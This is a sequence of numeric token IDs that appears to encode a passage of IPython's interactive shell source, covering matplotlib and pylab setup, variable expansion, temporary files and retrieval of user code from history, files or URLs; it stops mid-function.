220, 220, 220, 220, 35656, 198, 220, 220, 220, 220, 220, 220, 220, 3722, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1881, 286, 705, 20751, 3256, 705, 259, 20751, 3256, 393, 705, 259, 12102, 6, 611, 2723, 318, 407, 257, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 21231, 286, 4938, 2438, 13, 198, 220, 220, 220, 220, 220, 220, 220, 33793, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1649, 3722, 318, 705, 259, 20751, 3256, 428, 318, 617, 13216, 10223, 284, 7550, 319, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 262, 1306, 1627, 286, 262, 6152, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 3722, 11, 299, 2777, 2114, 796, 2116, 13, 15414, 62, 7645, 16354, 62, 37153, 13, 9122, 62, 20751, 7, 8189, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 3722, 11, 705, 705, 1635, 357, 77, 2777, 2114, 393, 657, 8, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 25757, 1104, 290, 279, 2645, 397, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 4075, 62, 15596, 26268, 796, 6045, 628, 220, 220, 220, 825, 7139, 62, 6759, 29487, 8019, 7, 944, 11, 11774, 28, 14202, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 36695, 14333, 2603, 29487, 8019, 290, 26098, 3785, 1104, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 2753, 262, 1708, 4831, 25, 628, 220, 220, 220, 220, 220, 220, 220, 352, 13, 2922, 262, 5035, 1785, 26268, 290, 2603, 29487, 8019, 30203, 198, 220, 220, 220, 220, 220, 220, 220, 362, 13, 900, 510, 2603, 29487, 8019, 329, 14333, 779, 351, 326, 30203, 198, 220, 220, 220, 220, 220, 220, 220, 513, 13, 17425, 5794, 1010, 329, 26098, 3785, 3359, 198, 220, 220, 220, 220, 220, 220, 220, 604, 13, 7139, 262, 6163, 11774, 1785, 26268, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 11774, 1058, 11902, 11, 4731, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 1813, 11, 35054, 262, 3572, 286, 2603, 29487, 8019, 25757, 30203, 284, 779, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 21754, 307, 530, 286, 6101, 7535, 338, 4855, 736, 2412, 11, 705, 39568, 3256, 705, 418, 87, 3256, 705, 30488, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 13655, 74, 3256, 705, 49345, 6, 393, 705, 45145, 33809, 4306, 356, 779, 262, 4277, 7147, 416, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2603, 29487, 8019, 357, 292, 34756, 416, 262, 2603, 29487, 8019, 1382, 12, 2435, 3689, 5556, 262, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2836, 338, 2603, 29487, 75, 2889, 66, 8398, 2393, 737, 220, 5740, 326, 407, 477, 736, 2412, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 787, 2565, 287, 477, 26307, 11, 329, 1672, 257, 12094, 20966, 7535, 460, 470, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3359, 5538, 26098, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 422, 6101, 7535, 13, 7295, 1330, 279, 2645, 397, 31391, 355, 42975, 198, 220, 220, 220, 220, 220, 220, 220, 11774, 11, 30203, 796, 42975, 13, 19796, 62, 48317, 62, 392, 62, 1891, 437, 7, 48317, 11, 2116, 13, 79, 2645, 397, 62, 48317, 62, 19738, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 11774, 14512, 705, 45145, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1002, 356, 423, 674, 717, 11774, 6356, 11, 3650, 340, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2116, 13, 79, 2645, 397, 62, 48317, 62, 19738, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 79, 2645, 397, 62, 48317, 62, 19738, 796, 11774, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 15323, 611, 484, 389, 1180, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 11774, 14512, 2116, 13, 79, 2645, 397, 62, 48317, 62, 19738, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 20361, 25, 26003, 1487, 284, 257, 1180, 25757, 2891, 15813, 25, 4064, 82, 2637, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 8554, 4064, 82, 2427, 2637, 4064, 357, 48317, 11, 2116, 13, 79, 2645, 397, 62, 48317, 62, 19738, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 11774, 11, 30203, 796, 42975, 13, 19796, 62, 48317, 62, 392, 62, 1891, 437, 7, 944, 13, 79, 2645, 397, 62, 48317, 62, 19738, 8, 628, 220, 220, 220, 220, 220, 220, 220, 42975, 13, 39022, 62, 6759, 29487, 8019, 7, 1891, 437, 8, 198, 220, 220, 220, 220, 220, 220, 220, 42975, 13, 11250, 495, 62, 45145, 62, 11284, 7, 944, 11, 30203, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 2735, 356, 1276, 15155, 262, 11774, 279, 2645, 397, 3382, 284, 779, 11, 290, 4259, 4064, 5143, 284, 1011, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 7110, 5992, 656, 1848, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 21633, 62, 48317, 7, 48317, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 19726, 873, 62, 37153, 13, 2301, 4592, 17816, 23002, 1009, 13436, 873, 6, 4083, 12286, 62, 16737, 796, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 42975, 13, 76, 489, 62, 16737, 7, 944, 13, 21230, 62, 18558, 7753, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1441, 11774, 11, 30203, 628, 220, 220, 220, 825, 7139, 62, 79, 2645, 397, 7, 944, 11, 11774, 28, 14202, 11, 1330, 62, 439, 28, 17821, 11, 7062, 62, 20500, 28, 25101, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 25526, 378, 279, 2645, 397, 1104, 379, 19124, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 4962, 319, 1104, 329, 2603, 29487, 8019, 11, 662, 46030, 656, 262, 14333, 198, 220, 220, 220, 220, 220, 220, 220, 25745, 477, 286, 299, 32152, 290, 279, 2645, 397, 11, 290, 4566, 942, 6101, 7535, 284, 9380, 198, 220, 220, 220, 220, 220, 220, 220, 9427, 351, 262, 25757, 1785, 9052, 13, 220, 383, 25757, 30203, 284, 307, 973, 460, 307, 198, 220, 220, 220, 220, 220, 220, 220, 42976, 6163, 351, 262, 11902, 7559, 48317, 15506, 4578, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 2446, 691, 6673, 662, 25138, 262, 25745, 284, 21365, 23248, 13, 21633, 62, 6759, 29487, 8019, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 11774, 1058, 11902, 11, 4731, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 1813, 11, 35054, 262, 3572, 286, 2603, 29487, 8019, 25757, 30203, 284, 779, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 21754, 307, 530, 286, 6101, 7535, 338, 4855, 736, 2412, 11, 705, 39568, 3256, 705, 418, 87, 3256, 705, 30488, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 13655, 74, 3256, 705, 49345, 6, 393, 705, 45145, 33809, 4306, 356, 779, 262, 4277, 7147, 416, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2603, 29487, 8019, 357, 292, 34756, 416, 262, 2603, 29487, 8019, 1382, 12, 2435, 3689, 5556, 262, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2836, 338, 2603, 29487, 75, 2889, 66, 8398, 2393, 737, 220, 5740, 326, 407, 477, 736, 2412, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 787, 2565, 287, 477, 26307, 11, 329, 1672, 257, 12094, 20966, 7535, 460, 470, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3359, 5538, 26098, 13, 198, 220, 220, 220, 220, 220, 220, 220, 1330, 62, 439, 1058, 11902, 11, 20512, 11, 4277, 25, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10127, 284, 466, 4600, 6738, 299, 32152, 1330, 1635, 63, 290, 4600, 6738, 279, 2645, 397, 1330, 1635, 63, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 287, 3090, 284, 8265, 17944, 13, 198, 220, 220, 220, 220, 220, 220, 220, 7062, 62, 20500, 1058, 39224, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 770, 4578, 318, 9514, 11, 645, 7062, 3275, 481, 307, 9066, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 422, 6101, 7535, 13, 7295, 13, 79, 2645, 397, 31391, 1330, 1330, 62, 79, 2645, 397, 628, 220, 220, 220, 220, 220, 220, 220, 11774, 11, 30203, 796, 2116, 13, 21633, 62, 6759, 29487, 8019, 7, 48317, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 775, 765, 284, 2948, 262, 11046, 286, 279, 2645, 397, 284, 3278, 1133, 262, 2836, 338, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 25745, 355, 3402, 416, 262, 4064, 8727, 9, 2153, 873, 11, 523, 356, 12260, 262, 14916, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2438, 287, 281, 6565, 25745, 11, 290, 356, 4296, 1635, 16885, 9, 2836, 62, 5907, 290, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2836, 62, 5907, 62, 30342, 351, 428, 1321, 13, 198, 220, 220, 220, 220, 220, 220, 220, 36545, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 1330, 62, 79, 2645, 397, 7, 5907, 11, 1330, 62, 439, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 9828, 546, 537, 672, 9451, 3891, 198, 220, 220, 220, 220, 220, 220, 220, 9514, 796, 19779, 834, 18780, 1040, 834, 20662, 198, 220, 220, 220, 220, 220, 220, 220, 1111, 796, 900, 7, 5907, 737, 3849, 5458, 7, 944, 13, 7220, 62, 5907, 737, 26069, 1945, 7, 570, 1850, 8, 198, 220, 220, 220, 220, 220, 220, 220, 537, 672, 9451, 796, 685, 1438, 329, 1438, 287, 1111, 611, 2116, 13, 7220, 62, 5907, 58, 3672, 60, 318, 407, 36545, 58, 3672, 60, 2361, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 7220, 62, 5907, 13, 19119, 7, 5907, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 7220, 62, 5907, 62, 30342, 13, 19119, 7, 5907, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 11774, 11, 30203, 11, 537, 672, 9451, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 41086, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 1401, 62, 11201, 392, 7, 944, 11, 23991, 11, 6795, 28, 15, 11, 1296, 1436, 28, 35, 13228, 8479, 1436, 3419, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 16870, 392, 21015, 9633, 287, 257, 4731, 13, 628, 220, 220, 220, 220, 220, 220, 220, 383, 6795, 4578, 9217, 703, 867, 13431, 2029, 262, 24955, 815, 198, 220, 220, 220, 220, 220, 220, 220, 307, 6807, 284, 804, 329, 262, 1957, 25745, 810, 284, 4292, 9633, 13, 628, 220, 220, 220, 220, 220, 220, 220, 383, 3298, 25745, 329, 7118, 318, 1464, 262, 2836, 338, 14333, 198, 220, 220, 220, 220, 220, 220, 220, 25745, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 36545, 796, 2116, 13, 7220, 62, 5907, 13, 30073, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5739, 796, 25064, 13557, 1136, 14535, 7, 18053, 10, 16, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 11052, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 770, 318, 8754, 611, 612, 3588, 470, 326, 867, 13431, 319, 262, 8931, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 304, 13, 70, 13, 611, 257, 4226, 1444, 1057, 62, 1370, 62, 32707, 3419, 3264, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1208, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 36545, 13, 19119, 7, 14535, 13, 69, 62, 17946, 874, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 775, 423, 284, 779, 764, 85, 18982, 3419, 994, 11, 780, 705, 944, 6, 318, 257, 4938, 290, 2219, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1438, 11, 290, 11581, 12429, 5907, 329, 764, 18982, 3419, 561, 787, 340, 46592, 351, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 262, 705, 944, 6, 4578, 286, 262, 2446, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 23991, 796, 1296, 1436, 13, 85, 18982, 7, 28758, 11, 26498, 41888, 4357, 479, 86, 22046, 28, 5907, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 35528, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 611, 1296, 1436, 3521, 470, 5794, 11, 655, 1309, 340, 467, 1418, 26084, 12214, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1208, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 23991, 628, 220, 220, 220, 825, 33480, 29510, 7753, 7, 944, 11, 1366, 28, 14202, 11, 21231, 11639, 541, 7535, 62, 19312, 62, 6, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 12050, 257, 649, 20218, 7753, 290, 1441, 663, 29472, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 1838, 257, 869, 284, 20218, 7753, 13, 28015, 927, 79, 357, 25598, 287, 257, 20218, 7753, 13, 28015, 67, 29510, 828, 198, 220, 220, 220, 220, 220, 220, 220, 475, 340, 28441, 262, 2727, 29472, 20947, 523, 20966, 7535, 20658, 340, 510, 198, 220, 220, 220, 220, 220, 220, 220, 379, 8420, 640, 13, 628, 220, 220, 220, 220, 220, 220, 220, 32233, 17311, 25, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 532, 1366, 7, 14202, 2599, 611, 1366, 318, 1813, 11, 340, 3011, 3194, 503, 284, 262, 20218, 2393, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3393, 11, 290, 262, 2393, 318, 4838, 757, 526, 15931, 628, 220, 220, 220, 220, 220, 220, 220, 26672, 3672, 796, 20218, 7753, 13, 28015, 67, 29510, 7, 40290, 28, 40290, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 29510, 15908, 82, 13, 33295, 7, 15908, 3672, 8, 628, 220, 220, 220, 220, 220, 220, 220, 5412, 11, 29472, 796, 20218, 7753, 13, 28015, 927, 79, 7, 4458, 9078, 3256, 21231, 11, 26672, 28, 15908, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 28686, 13, 19836, 7, 28144, 8, 220, 1303, 1550, 3964, 11, 612, 460, 691, 307, 530, 1280, 5412, 319, 257, 2393, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 29510, 16624, 13, 33295, 7, 34345, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 1366, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 1280, 7, 34345, 11, 705, 86, 11537, 355, 45218, 62, 7753, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 45218, 62, 7753, 13, 13564, 7, 7890, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 29472, 628, 220, 220, 220, 2488, 917, 420, 198, 220, 220, 220, 825, 3551, 7, 944, 11, 7890, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 46162, 38827, 11617, 25, 19430, 257, 4731, 284, 262, 4277, 5072, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 9828, 10786, 9492, 5275, 23248, 13, 13564, 3419, 318, 39224, 11, 779, 25064, 13, 19282, 448, 2427, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2129, 8344, 341, 20361, 11, 8931, 5715, 28, 17, 8, 198, 220, 220, 220, 220, 220, 220, 220, 25064, 13, 19282, 448, 13, 13564, 7, 7890, 8, 628, 220, 220, 220, 2488, 917, 420, 198, 220, 220, 220, 825, 3551, 62, 8056, 7, 944, 11, 7890, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 46162, 38827, 11617, 25, 19430, 257, 4731, 284, 262, 4277, 4049, 5072, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 9828, 10786, 9492, 5275, 23248, 13, 13564, 62, 8056, 3419, 318, 39224, 11, 779, 25064, 13, 301, 1082, 81, 2427, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2129, 8344, 341, 20361, 11, 8931, 5715, 28, 17, 8, 198, 220, 220, 220, 220, 220, 220, 220, 25064, 13, 301, 1082, 81, 13, 13564, 7, 7890, 8, 628, 220, 220, 220, 825, 905, 62, 26060, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 15307, 257, 8748, 3275, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 2443, 13, 7700, 7, 4061, 7535, 13, 7295, 13, 26060, 13, 3849, 5275, 62, 26060, 8, 628, 220, 220, 220, 825, 7925, 62, 15414, 62, 6615, 7, 944, 11, 2837, 62, 2536, 11, 8246, 28, 25101, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 13615, 355, 257, 4731, 257, 900, 286, 5128, 2106, 24314, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 2837, 62, 2536, 1058, 4731, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 900, 286, 24314, 318, 1813, 355, 257, 4731, 11, 588, 366, 93, 20, 14, 21, 12, 93, 19, 14, 17, 604, 25, 23, 860, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1201, 428, 2163, 318, 329, 779, 416, 5536, 5499, 543, 651, 511, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7159, 355, 13042, 13, 383, 1271, 878, 262, 1220, 318, 262, 6246, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1271, 25, 5299, 77, 2925, 299, 736, 422, 262, 1459, 6246, 13, 628, 220, 220, 220, 220, 220, 220, 220, 8246, 1058, 20512, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2750, 4277, 11, 262, 13686, 5128, 318, 973, 13, 220, 1002, 428, 318, 2081, 11, 262, 8246, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5128, 2106, 318, 973, 2427, 13, 628, 220, 220, 220, 220, 220, 220, 220, 11822, 198, 220, 220, 220, 220, 220, 220, 220, 37404, 628, 220, 220, 220, 220, 220, 220, 220, 311, 677, 274, 460, 307, 3417, 351, 734, 407, 602, 25, 628, 220, 220, 220, 220, 220, 220, 220, 1635, 7559, 45, 25, 44, 15506, 4613, 3210, 21015, 1296, 11, 1724, 1390, 3709, 399, 986, 7, 44, 12, 16, 737, 198, 220, 220, 220, 220, 220, 220, 220, 1635, 7559, 45, 12, 44, 15506, 4613, 2291, 3709, 399, 492, 44, 357, 20225, 36123, 737, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 3951, 796, 2116, 13, 23569, 62, 37153, 13, 1136, 62, 9521, 62, 1525, 62, 2536, 7, 9521, 62, 2536, 11, 8246, 28, 1831, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 37082, 77, 1911, 22179, 7, 87, 329, 4808, 11, 4808, 11, 2124, 287, 3951, 8, 628, 220, 220, 220, 825, 1064, 62, 7220, 62, 8189, 7, 944, 11, 2496, 11, 8246, 28, 17821, 11, 12972, 62, 8807, 28, 25101, 11, 14267, 62, 12685, 7656, 62, 44453, 28, 17821, 11, 2989, 62, 5907, 28, 25101, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 3855, 257, 2438, 4731, 422, 2106, 11, 2393, 11, 19016, 11, 393, 257, 4731, 393, 15021, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 318, 8384, 973, 416, 5536, 5499, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 628, 220, 220, 220, 220, 220, 220, 220, 2496, 1058, 965, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 317, 4731, 31577, 2438, 284, 19818, 13, 770, 481, 307, 3088, 8148, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 355, 25, 16069, 286, 5128, 2106, 357, 3826, 4064, 23569, 329, 15582, 828, 19016, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 11188, 764, 9078, 2393, 11, 29472, 11, 393, 281, 5408, 22232, 284, 257, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4731, 393, 42755, 287, 262, 2836, 25745, 13, 628, 220, 220, 220, 220, 220, 220, 220, 8246, 1058, 20512, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 2081, 357, 12286, 828, 19818, 8246, 2106, 13, 7875, 645, 1245, 319, 262, 584, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 45069, 11701, 13, 628, 220, 220, 220, 220, 220, 220, 220, 12972, 62, 8807, 1058, 20512, 357, 12286, 10352, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5514, 1949, 284, 21207, 21015, 2438, 11, 466, 407, 1949, 5559, 5050, 284, 36899, 2393, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 28000, 1098, 10143, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 198, 220, 220, 220, 220, 220, 220, 220, 35656, 198, 220, 220, 220, 220, 220, 220, 220, 317, 4731, 286, 2438, 13, 628, 220, 220, 220, 220, 220, 220, 220, 11052, 12331, 318, 4376, 611, 2147, 318, 1043, 11, 290, 5994, 12331, 611, 340, 47850, 198, 220, 220, 220, 220, 220, 220, 220, 284, 281, 2134, 286, 1194, 2099, 13, 554, 1123, 1339, 11, 764, 22046, 58, 15, 60, 318, 257, 3601, 540, 198, 220, 220, 220, 220, 220, 220, 220, 3275, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 2438, 796, 2116, 13, 2302, 974, 62, 15414, 62, 6615, 7, 16793, 11, 8246, 28, 1831, 8, 220, 1303, 25339, 2106, 198, 220, 220, 220, 220, 220, 220, 220, 611, 2438, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 2438, 198, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2496, 13, 9688, 2032, 342, 7, 10786, 4023, 1378, 3256, 705, 5450, 1378, 11537, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 1280, 9078, 13, 961, 62, 9078, 62, 6371, 7, 16793, 11, 14267, 62, 12685, 7656, 62, 44453, 28, 48267, 62, 12685, 7656, 62, 44453, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 34371, 10707, 1098, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 407, 12972, 62, 8807, 1058, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 2896, 17436, 1330, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 422, 2956, 297, 571, 13, 25927, 1330, 19016, 9654, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2882, 796, 19016, 9654, 7, 16793, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 2882, 13, 961, 22446, 12501, 1098, 10786, 75, 10680, 16, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 11052, 12331, 7, 7203, 6, 4, 82, 6, 1283, 284, 307, 555, 46155, 19570, 4064, 2496, 8, 628, 220, 220, 220, 220, 220, 220, 220, 2785, 62, 16793, 796, 685, 16793, 60, 198, 220, 220, 220, 220, 220, 220, 220, 1949, 1058, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2785, 62, 16793, 13, 28463, 7, 15, 11, 1136, 62, 9078, 62, 34345, 7, 16793, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 24418, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1208, 628, 220, 220, 220, 220, 220, 220, 220, 329, 256, 13655, 287, 2785, 62, 16793, 1058, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 28686, 13, 6978, 13, 4468, 576, 7, 83, 13655, 2599, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 4149, 2393, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 1058, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 1280, 9078, 13, 961, 62, 9078, 62, 7753, 7, 83, 13655, 11, 14267, 62, 12685, 7656, 62, 44453, 28, 48267, 62, 12685, 7656, 62, 44453, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 34371, 10707, 1098, 12331, 1058, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 407, 12972, 62, 8807, 1058, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 33245, 62, 9654, 7, 83, 13655, 4032, 81, 3256, 21004, 11639, 75, 10680, 16, 11537, 355, 277, 1058, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 277, 13, 961, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 11052, 12331, 7, 7203, 6, 4, 82, 6, 1283, 284, 307, 555, 46155, 19570, 4064, 2496, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 28686, 13, 6978, 13, 9409, 343, 7, 418, 13, 6978, 13, 11201, 392, 7220, 7, 83, 13655, 8, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 11052, 12331, 7203, 6, 4, 82, 6, 318, 257, 8619, 11, 407, 257, 3218, 2393, 526, 4064, 2496, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 2989, 62, 5907, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 20904, 25745, 284, 3440, 2134, 2723, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2134, 62, 10951, 796, 2116, 13, 15252, 62, 1040, 806, 7, 16793, 11, 3703, 62, 5715, 28, 16, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2134, 62, 10951, 17816, 9275, 20520, 290, 2134, 62, 10951, 17816, 10459, 6, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 2134, 62, 10951, 17816, 10459, 20520, 628, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 